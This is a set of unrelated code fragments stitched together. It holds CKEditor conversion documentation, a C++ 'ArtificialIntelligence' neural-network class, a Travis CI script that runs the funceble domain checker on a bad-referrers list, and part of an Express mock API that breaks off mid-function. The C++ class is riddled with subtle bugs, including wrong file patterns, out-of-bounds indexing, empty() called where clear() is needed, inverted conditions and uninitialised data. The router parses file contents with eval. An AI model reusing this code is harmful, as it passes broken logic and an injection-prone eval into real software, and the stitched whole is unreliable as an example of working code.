* if markers are named `foo:abc`, `foo:bar`, then it is possible to listen to `addMarker:foo` or `addMarker:foo:abc` and
* `addMarker:foo:bar` events.
*
* If the marker range is not collapsed:
*
* * the event is fired for each item in the marker range one by one,
* * `conversionApi.consumable` includes each item of the marker range and the consumable value is same as event name.
*
* If the marker range is collapsed:
*
* * there is only one event,
* * `conversionApi.consumable` includes marker range with event name.
*
* If selection inside a marker is converted:
*
* * there is only one event,
* * `conversionApi.consumable` includes selection instance with event name.
*
* @event addMarker
* @param {Object} data Additional information about the change.
* @param {module:engine/model/item~Item|module:engine/model/selection~Selection} data.item Item inside the new marker or
* the selection that is being converted.
* @param {module:engine/model/range~Range} [data.range] Range spanning over converted item. Available only in marker conversion, if
* the marker range was not collapsed.
* @param {module:engine/model/range~Range} data.markerRange Marker range.
* @param {String} data.markerName Marker name.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired when marker is removed from the model.
*
* `removeMarker` is a namespace for a class of events. Names of actually called events follow this pattern:
* `removeMarker:markerName`. By specifying certain marker names, you can make the events even more gradual. For example,
* if markers are named `foo:abc`, `foo:bar`, then it is possible to listen to `removeMarker:foo` or `removeMarker:foo:abc` and
* `removeMarker:foo:bar` events.
*
* @event removeMarker
* @param {Object} data Additional information about the change.
* @param {module:engine/model/range~Range} data.markerRange Marker range.
* @param {String} data.markerName Marker name.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
}
mix( DowncastDispatcher, EmitterMixin );
// Helper function, checks whether change of `marker` at `modelPosition` should be converted. Marker changes are not
// converted if they happen inside an element with custom conversion method.
//
// @param {module:engine/model/position~Position} modelPosition
// @param {module:engine/model/markercollection~Marker} marker
// @param {module:engine/conversion/mapper~Mapper} mapper
// @returns {Boolean}
function shouldMarkerChangeBeConverted( modelPosition, marker, mapper ) {
const range = marker.getRange();
const ancestors = Array.from( modelPosition.getAncestors() );
ancestors.shift(); // Remove root element. It cannot be passed to `model.Range#containsItem`.
ancestors.reverse();
const hasCustomHandling = ancestors.some( element => {
if ( range.containsItem( element ) ) {
const viewElement = mapper.toViewElement( element );
return !!viewElement.getCustomProperty( 'addHighlight' );
}
} );
return !hasCustomHandling;
}
/**
* Conversion interface that is registered for given {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher}
* and is passed as one of parameters when {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher dispatcher}
* fires its events.
*
* @interface module:engine/conversion/downcastdispatcher~DowncastConversionApi
*/
/**
* The {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher} instance.
*
* @member {module:engine/conversion/downcastdispatcher~DowncastDispatcher} #dispatcher
*/
/**
* Stores information about what parts of processed model item are still waiting to be handled. After a piece of model item
* was converted, appropriate consumable value should be {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed}.
*
* @member {module:engine/conversion/modelconsumable~ModelConsumable} #consumable
*/
/**
* The {@link module:engine/conversion/mapper~Mapper} instance.
*
* @member {module:engine/conversion/mapper~Mapper} #mapper
*/
/**
* The {@link module:engine/model/schema~Schema} instance set for the model that is downcast.
*
* @member {module:engine/model/schema~Schema} #schema
*/
/**
* The {@link module:engine/view/downcastwriter~DowncastWriter} instance used to manipulate data during conversion.
*
* @member {module:engine/view/downcastwriter~DowncastWriter} #writer
*/
/**
* An object with an additional configuration which can be used during conversion process. Available only for data downcast conversion.
*
* @member {Object} #options
*/
|
#include "ArtificialIntelligence.h";
#include <random>;
#include <bitset>;
#include <string>;
#include <iostream>;
#include <fstream>;
#include <windows.h>;
#include <thread>;
using namespace std;
//This constructor runs the Artificial Intelligence.
ArtificialIntelligence::ArtificialIntelligence(int count) {
id = bitset<8>(count).to_string();
updatedKey = id;
setupAI();
thread(Thread);
cout << "The AI" << id << " is running!!!" << endl;
}
void ArtificialIntelligence::Thread() {
cout << "The AI " << id << " is running!!!" << endl;
int dataSetCount = 0;
vector<WCHAR*> files;
vector<WCHAR*> newFiles;
//Load the files into the vector for the initial files.
WIN32_FIND_DATA fd;
HANDLE audio = FindFirstFile((LPCWSTR)".mp3", &fd);
HANDLE image = FindFirstFile((LPCWSTR)".png", &fd);
HANDLE text = FindFirstFile((LPCWSTR)"*.txt", &fd);
HANDLE video = FindFirstFile((LPCWSTR)"*.avi", &fd);
int counter = 0;
int pointOne = 0;
int pointTwo = 0;
int pointThree = 0;
int pointFour = 0;
if (audio != INVALID_HANDLE_VALUE) {
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(audio, &fd));
} else if (image != INVALID_HANDLE_VALUE) {
pointOne = counter;
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(image, &fd));
} else if (text != INVALID_HANDLE_VALUE) {
pointTwo = counter;
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(text, &fd));
FindClose(text);
} else if (video != INVALID_HANDLE_VALUE) {
pointThree = counter;
do {
newFiles.push_back(fd.cFileName);
} while (FindNextFile(video, &fd));
}
pointFour = counter;
int initialSize = files.size();
int count = files.size();
//This runs the Artificial Intelligence until told otherwise.
while (updatedKey == id) {
/* --- Check for new data files for DynamicNetworkGenerator's text RNN, video/image CNN to build the network. --- */
if (audio != INVALID_HANDLE_VALUE) {
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(audio, &fd));
} else if (image != INVALID_HANDLE_VALUE) {
pointOne = counter;
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(image, &fd));
} else if (text != INVALID_HANDLE_VALUE) {
pointTwo = counter;
do {
newFiles.push_back(fd.cFileName);
counter += 1;
} while (FindNextFile(text, &fd));
FindClose(text);
} else if (video != INVALID_HANDLE_VALUE) {
pointThree = counter;
do {
newFiles.push_back(fd.cFileName);
} while (FindNextFile(video, &fd));
}
count = newFiles.size();
//This generates Neural Networks for the AI or runs the data through the Neural network in the situation that there is new files.
if ((initialSize - count) < 0) {
files = newFiles;
newFiles.empty();
/* --- Run data from section above through the appropriate Neural Network to generate a network if required. --- */
for (int i = 0; i < files.size(); i++) {
string line;
ifstream fileInput;
fileInput.open(files[i], ios::binary);
int n = 1;
int counting = 0;
double count = 0.0;
vector<double> audioData;
vector<string> imageDataSub;
vector<vector<double>> imageData;
vector<double> textData;
vector<string> videoDataSub;
vector<vector<double>> videoData;
if (i <= pointOne) {
while (getline(fileInput, line)) {
for (int j = line.size(); j >= 0; j--) {
if (line[j] == '1') {
count += n;
}
n *= 2;
}
n = 1;
while (count > 0) {
count /= 10;
}
audioData.push_back(count);
}
} else if (i > pointOne && i <= pointTwo) {
while (getline(fileInput, line)) {
if (counting == 2) {
imageDataSub.push_back(line);
vector<double> colour;
for (int j = 0; j < imageDataSub.size(); j++) {
for (int k = imageDataSub[j].size(); k >= 0; k--) {
if (line[j] == '1') {
count += n;
}
n *= 2;
}
n = 1;
while (count > 0) {
count /= 10;
}
colour.push_back(count);
}
imageData.push_back(colour);
}
else {
imageDataSub.push_back(line);
counting += 1;
}
}
} else if (i > pointTwo && i <= pointThree) {
while (getline(fileInput, line)) {
for (int j = line.size(); j >= 0; j--) {
if (line[j] == '1') {
count += n;
}
n *= 2;
}
n = 1;
while (count < 0) {
count /= 10;
}
textData.push_back(count);
}
} else {
while (getline(fileInput, line)) {
if (counting == 2) {
videoDataSub.push_back(line);
vector<double> colour;
for (int j = 0; j < videoDataSub.size(); j++) {
for (int k = videoDataSub[j].size(); k >= 0; k--) {
if (line[j] == '1') {
count += n;
}
n *= 2;
}
n = 1;
while (count > 0) {
count /= 10;
}
colour.push_back(count);
}
videoData.push_back(colour);
}
else {
videoDataSub.push_back(line);
counting += 1;
}
}
}
/* --- Feed the appropriate data files into the appropriate existing neural network if required and fetch any appropriate data from the Core's memory matrix. --- */
for (int i = 0; i < textData.size(); i++) {
if (i <= pointOne) {
_audioNetwork->feedFoward(audioData);
/* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
if (dataSetCount <= 65536) {
DataSet *ds = new DataSet();
ds->id = bitset<16>(dataSetCount).to_string();
ds->memoryMatrixInputS = audioData;
ds->memoryMatrixOutput = _audioNetwork->output;
dataSets.push_back(ds);
dataSetCount += 1;
}
} else if (i > pointOne && i <= pointTwo) {
for (int j = 0; j < imageData.size(); j++) {
_imageNetwork->feedFoward(imageData[j]);
}
/* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
if (dataSetCount <= 65536) {
DataSet *ds = new DataSet();
ds->id = bitset<16>(dataSetCount).to_string();
ds->memoryMatrixInputL = imageData;
ds->memoryMatrixOutput = _imageNetwork->output;
dataSets.push_back(ds);
dataSetCount += 1;
}
} else if (i > pointTwo && i <= pointThree) {
_textNetwork->feedFoward(textData);
/* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
if (dataSetCount >= 65536) {
DataSet *ds = new DataSet();
ds->id = bitset<16>(dataSetCount).to_string();
ds->memoryMatrixInputS = textData;
ds->memoryMatrixOutput = _textNetwork->output;
dataSets.push_back(ds);
dataSetCount += 1;
}
} else {
for (int j = 0; j < videoData.size(); j++) {
_videoNetwork->feedFoward(videoData[j]);
}
/* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
if (dataSetCount <= 65536) {
DataSet *ds = new DataSet();
ds->id = bitset<16>(dataSetCount).to_string();
ds->memoryMatrixInputL = videoData;
ds->memoryMatrixOutput = _videoNetwork->output;
dataSets.push_back(ds);
dataSetCount += 1;
}
}
}
}
}
vector<vector<vector<string>>> networkGenomes;
/* --- Check on the performance of the neural networks. --- */
for (int i = 0; i < networkDetails.size(); i++) {
if (i <= pointOne) {
networkGenomes.push_back(_audioNetwork->performance());
} else if (i > pointOne && i <= pointTwo) {
networkGenomes.push_back(_imageNetwork->performance());
} else if (i > pointTwo && i <= pointThree) {
networkGenomes.push_back(_textNetwork->performance());
} else {
networkGenomes.push_back(_videoNetwork->performance());
}
}
//Run a fitness test on the networks.
vector<vector<vector<int>>> fitnessScore;
vector<vector<vector<string>>> Genomes;
for (int i = 0; i < networkGenomes.size(); i++) {
vector<vector<int>> fitnessScoreOne;
vector<vector<string>> GenomesOne;
for (int j = 0; j < networkGenomes[i].size(); j++) {
vector<int> fitnessScoreTwo;
vector<string> GenomesTwo;
for (int k = 0; k < networkGenomes[i][j].size(); k++) {
string genome = networkGenomes[i][j][k];
int score = 0;
for (int l = 0; l < genome.size(); l++) {
switch (genome[l]) {
case '1':
score += 1;
break;
case '2':
score += 1;
break;
case '3':
score += 2;
break;
case '4':
score += 1;
break;
case '5':
score += 2;
break;
case '6':
score += 2;
break;
case '7':
score += 3;
break;
case '8':
score += 1;
break;
case '9':
score += 2;
break;
case 'A':
score += 2;
break;
}
}
fitnessScoreTwo.push_back(score);
GenomesTwo.push_back(genome);
}
fitnessScoreOne.push_back(fitnessScoreTwo);
GenomesOne.push_back(GenomesTwo);
}
Genomes.push_back(GenomesOne);
fitnessScore.push_back(fitnessScoreOne);
}
//Calculate the performance of the network.
vector<vector<double>> data; //Network, Node.
vector<vector<double>> targets; //Network, Target.
vector<double> neuron;
vector<double> neuronOne;
double sum = 0.0;
for (int i = 0; i < networkDetails.size(); i++) {
neuron = data[i];
for (int j = 0; j < networkDetails[i]->network->m_layer.size(); j++) {
for (int k = 0; k < networkDetails[i]->network->m_layer[j].size(); k++) {
if (networkDetails[i]->network->m_layer[j][k]->_ann == true) {
for (int l = 0; l < neuron.size(); l++) {
if (l == 0 && j == 0) {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward.size(); m++) {
neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward[m].weight);
}
} else {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward.size(); m++) {
neuronOne[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward[m].weight;
}
}
}
if (k++ == networkDetails[i]->network->m_layer[j].size()) {
for (int l = 0; l < neuronOne.size(); l++) {
neuronOne[l] = activationFunction(neuronOne[l]);
}
neuron = neuronOne;
neuronOne.empty();
}
} else if (networkDetails[i]->network->m_layer[j][k]->_rnn == true) {
for (int l = 0; l < neuron.size(); l++) {
if (l == 0 && j == 0) {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward.size(); m++) {
neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward[m].weight);
}
} else {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward.size(); m++) {
neuronOne[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward[m].weight;
}
}
}
if (k++ == networkDetails[i]->network->m_layer[j].size()) {
for (int l = 0; l < 2; l++) {
for (int m = 0; m < neuronOne.size(); m++) {
if (l == 0) {
neuronOne[m] *= networkDetails[i]->network->m_layer[j][k]->rnn->weightsRecurrent[m].weight;
} else {
neuronOne[m] *= activationFunction(neuronOne[m]);
}
}
if (l == 1) {
neuron = neuronOne;
neuronOne.empty();
}
}
}
} else if (networkDetails[i]->network->m_layer[j][k]->_lstm == true) {
for (int l = 0; l < neuron.size(); l++) {
if (l == 0 && j == 0) {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward.size(); m++) {
neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward[m].weight);
}
} else {
for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward.size(); m++) {
neuron[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward[m].weight;
}
}
}
double cell = 0.0;
double prevCell = 1.0;
for (int l = 0; l < neuron.size(); l++) {
if (l == 0 && j == 0) {
cell = activationFunction((neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[0].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[0].weight*neuron[l]));
cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[0].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[1].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[1].weight*neuron[l]));
cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[1].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[2].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[2].weight*neuron[l]));
neuronOne.push_back(activationFunction(cell) * networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[2].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[3].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[3].weight*neuron[l])));
} else {
prevCell = cell;
cell = activationFunction((neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[0].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[0].weight*neuron[l]));
cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[0].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[1].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[1].weight*neuron[l]));
cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[1].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[2].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[2].weight*neuron[l]));
neuronOne[l] += activationFunction(cell) * networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[2].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[3].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[3].weight*neuron[l]));
}
}
if (k++ == networkDetails[i]->network->m_layer[j].size()) {
neuron = neuronOne;
neuronOne.empty();
}
}
}
}
vector<double> delta;
for (int j = 0; j < targets[i].size(); j++) {
delta.push_back(targets[i][j] - neuron[j]);
}
vector<int> accurracy;
for (int j = 0; j < delta.size(); j++) {
if (delta[j] <= 0.1) {
accurracy.push_back(1);
} else {
accurracy.push_back(0);
}
}
int halfway = 0;
if (networkDetails[i]->network->m_layer.size() % 2 == 0) {
halfway = networkDetails[i]->network->m_layer.size() / 2;
} else {
halfway = (networkDetails[i]->network->m_layer.size() / 2) + 0.5;
}
int count = 0;
for (int j = 0; j < accurracy.size(); j++) {
if (accurracy[j] == 1) {
count += 1;
}
}
if (count >= halfway) {
change.push_back(1);
} else {
change.push_back(0);
}
}
//Find the best weight for the neuron.
string parentS;
int parentI;
int networkCount = 0;
double updatingWeights;
for (int i = 0; i < fitnessScore.size(); i++) {
for (int j = 0; j < fitnessScore[i].size(); j++) {
parentS = Genomes[i][j][0];
parentI = fitnessScore[i][j][0];
for (int k = 0; k < fitnessScore[i][j].size(); k++) {
if (parentI < fitnessScore[i][j][k]) {
parentI = fitnessScore[i][j][k];
parentS = Genomes[i][j][k];
}
}
updatingWeights = (double)parentI;
updatingWeights = updatingWeights / (updatingWeights + 1);
updatingWeights *= updatingWeights;
//Update the appropriate networks with the updatingWeights value.
if (i <= pointOne) {
if (_audioNetwork->m_layer[i][j]->_ann == true) {
if (change[i] == 1) {
for (int k = 0; k < _audioNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_audioNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
} else {
_audioNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
}
}
}
} else if (_audioNetwork->m_layer[i][j]->_rnn == true) {
if (change[i] == 1) {
for (int k = 0; k < _audioNetwork->m_layer[i][j]->rnn->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_audioNetwork->m_layer[i][j]->rnn->weightsFoward[k].weight += updatingWeights;
} else {
_audioNetwork->m_layer[i][j]->rnn->weightsFoward[k].weight -= updatingWeights;
}
}
for (int k = 0; k < _audioNetwork->m_layer[i][j]->rnn->weightsRecurrent.size(); k++) {
if (rand() % 2 == 0) {
_audioNetwork->m_layer[i][j]->rnn->weightsRecurrent[k].weight += updatingWeights;
} else {
_audioNetwork->m_layer[i][j]->rnn->weightsRecurrent[k].weight -= updatingWeights;
}
}
}
}
} else if (i > pointOne && i <= pointTwo) {
if (change[i] == 1) {
for (int k = 0; k < _imageNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_imageNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
} else {
_imageNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
}
}
}
} else if (i > pointTwo && i <= pointThree) {
if (change[i] == 1) {
if (_textNetwork->m_layer[i][j]->_ann == true) {
for (int k = 0; k < _textNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_textNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
} else {
_textNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
}
}
} else if (_textNetwork->m_layer[i][j]->_lstm == true) {
for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_textNetwork->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
} else {
_textNetwork->m_layer[i][j]->lstm->weightsFoward[k].weight -= updatingWeights;
}
}
for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightsRecurrent.size(); k++) {
if (rand() % 2 == 0) {
_textNetwork->m_layer[i][j]->lstm->weightsRecurrent[k].weight += updatingWeights;
} else {
_textNetwork->m_layer[i][j]->lstm->weightsRecurrent[k].weight -= updatingWeights;
}
}
for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightCell.size(); k++) {
if (rand() % 2 == 0) {
_textNetwork->m_layer[i][j]->lstm->weightCell[k].weight += updatingWeights;
} else {
_textNetwork->m_layer[i][j]->lstm->weightCell[k].weight -= updatingWeights;
}
}
}
}
} else if (i > pointThree && i <= pointFour) {
if (change[i] == 1) {
for (int k = 0; k < _videoNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
_videoNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
} else {
_videoNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
}
}
}
} else {
if (change[i] == 1) {
if (networkDetails[networkCount]->network->m_layer[i][j]->_ann == true) {
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
}
}
} else if (networkDetails[networkCount]->network->m_layer[i][j]->_rnn == true) {
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward[k].weight -= updatingWeights;
}
}
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent[k].weight -= updatingWeights;
}
}
} else if (networkDetails[networkCount]->network->m_layer[i][j]->_lstm == true) {
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
}
}
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent[k].weight -= updatingWeights;
}
}
for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell.size(); k++) {
if (rand() % 2 == 0) {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell[k].weight += updatingWeights;
} else {
networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell[k].weight -= updatingWeights;
}
}
networkCount += 1;
}
}
}
}
}
//Update the ID key if the condition to chance it is met.
int halfway = 0;
if (networkDetails.size() % 2 == 0) {
halfway = networkDetails.size() / 2;
} else {
halfway = (networkDetails.size() / 2) + 0.5;
}
int count = 0;
for (int i = 0; i < change.size(); i++) {
if (change[i] == 1) {
count += 1;
}
}
if (count < halfway) {
counter += 1;
}
if (counter == 100) {
updatedKey = bitset<16>(65536).to_string();
}
//Calculates the number of Data Sets processed by the AI.
for (int i = 0; i < networkDetails.size(); i++) {
dsProcessedTotal += networkDetails[i]->dataSetsProcessed;
}
}
}
//This method sets up the text based Recurrent Neural Network and the video and image CNN's.
void ArtificialIntelligence::setupAI() {
vector<vector<string>> networkGenerator;
vector<vector<string>> audioNetwork;
vector<vector<string>> imageNetwork;
vector<vector<string>> textNetwork;
vector<vector<string>> videoNetwork;
vector<string> layer;
//This creates the neural network for Generating the neural networks.
networkGenerator.push_back(layer);
for (int i = 0; i < 3; i++) {
networkGenerator.back().push_back("ANNBlock");
}
networkGenerator.back().push_back("BIASBlock");
networkGenerator.push_back(layer);
for (int i = 0; i < 4; i++) {
networkGenerator.back().push_back("RNNBlock");
}
networkGenerator.back().push_back("BIASBlock");
networkGenerator.push_back(layer);
for (int i = 0; i < 4; i++) {
networkGenerator.back().push_back("ANNBlock");
}
networkGenerator.back().push_back("BIASBlock");
//This creates the neural network for Audio.
audioNetwork.push_back(layer);
audioNetwork.back().push_back("ANNBlock");
audioNetwork.back().push_back("BIASBlock");
audioNetwork.push_back(layer);
audioNetwork.back().push_back("RNNBlock");
audioNetwork.back().push_back("BIASBlock");
audioNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
for (int j = 0; j < 10; j++) {
audioNetwork.back().push_back("ANNBlock");
}
audioNetwork.back().push_back("BIASBlock");
}
//This creates the neural network for Image.
imageNetwork.push_back(layer);
for (int i = 0; i < 4; i++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
for (int i = 0; i < 2; i++) {
imageNetwork.push_back(layer);
for (int j = 0; j < 4; j++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
}
imageNetwork.push_back(layer);
for (int i = 0; i < 6; i++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
//This creates the neural network for Text.
textNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
textNetwork.back().push_back("ANNBlock");
}
textNetwork.back().push_back("BIASBlock");
textNetwork.push_back(layer);
textNetwork.back().push_back("LSTMBlock");
textNetwork.back().push_back("BIASBlock");
textNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
textNetwork.back().push_back("ANNBlock");
}
textNetwork.back().push_back("BIASBlock");
//This creates the neural network for Video.
videoNetwork.push_back(layer);
for (int i = 0; i < 4; i++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
for (int i = 0; i < 2; i++) {
videoNetwork.push_back(layer);
for (int j = 0; j < 4; j++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
}
videoNetwork.push_back(layer);
for (int i = 0; i < 6; i++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
//This generates the neural networks and stores them in the AI.
_networkGenerator = new DynamicNetworkGenerator(networkGenerator);
_audioNetwork = new DynamicNetworkGenerator(audioNetwork);
_imageNetwork = new DynamicNetworkGenerator(imageNetwork);
_textNetwork = new DynamicNetworkGenerator(textNetwork);
_videoNetwork = new DynamicNetworkGenerator(videoNetwork);
}
//This creates a new Neural Network for the AI.
void ArtificialIntelligence::addNetwork(int count, vector<vector<string>> networkSetup) {
threadDetails *td = new threadDetails();
td->id = bitset<4>(count).to_string();
td->network = new DynamicNetworkGenerator(networkSetup);
td->active = true;
networkDetails.push_back(td);
}
//This calculates the performance of a network from the AI.
string ArtificialIntelligence::networkPerformance() {
string genome = "";
for (int i = 0; i < networkDetails.size(); i++) {
if ((networkDetails[i]->dataSetsProcessed/networkDetails[i]->dataSetsCollected) >= 90.0) {
genome += "1";
} else {
genome += "0";
}
}
return genome;
}
|
#!/bin/bash
# ********************
# Run Funceble Testing
# ********************
# ****************************************************************
# This uses the awesome funceble script created by Nissar Chababy
# Find funceble at: https://github.com/funilrys/funceble
# ****************************************************************
# ******************
# Set our Input File
# ******************
_input=$TRAVIS_BUILD_DIR/.dev-tools/_input_source/bad-referrers.list
# *********************************
# Make scripts executable by Travis
# *********************************
sudo chmod +x $TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool
sudo chmod +x $TRAVIS_BUILD_DIR/.dev-tools/_funceble/funceble
# *******************************************
# Make Sure We Are In The Travis Build Folder
# *******************************************
cd $TRAVIS_BUILD_DIR/.dev-tools/_funceble/
# *************************
# Run Funceble Install Tool
# *************************
YEAR=$(date +%Y)
MONTH=$(date +%m)
sudo bash $TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool --dev -u --autosave-minutes 10 --commit-autosave-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER} [funceble]" --commit-results-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER}" -i
# sudo bash $TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool --autosave-minutes 40 --commit-autosave-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER} [funceble]" --commit-results-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER}" -i
# ************************************
# Run Funceble and Check Domains List
# ************************************
sudo bash $TRAVIS_BUILD_DIR/.dev-tools/_funceble/funceble --cmd-before-end "bash $TRAVIS_BUILD_DIR/.dev-tools/final-commit.sh" --travis -a -ex -h --plain --split -f $_input
exit 0
|
<gh_stars>1-10
//流程列表
router.route('/spms/approve/approve/')
.all(function(req,res,next){
next();
})
.get(function(req,res,next){
res.writeHead(200, { 'Content-Type': 'application/json' });
var data = fs.readFileSync('routers/files/process-list.json');
res.end(JSON.stringify(eval("("+data+")")));
next();
})
//发起流程
router.route('/spms/approveapply/submit/')
.all(function(req,res,next){
next();
})
.post(function(req, res, next){
var id = parseInt(Math.random(0,100)*100)+''+parseInt(Math.random(0,100)*100)+''+parseInt(Math.random(0,100)*100);
var Backdatas = {};
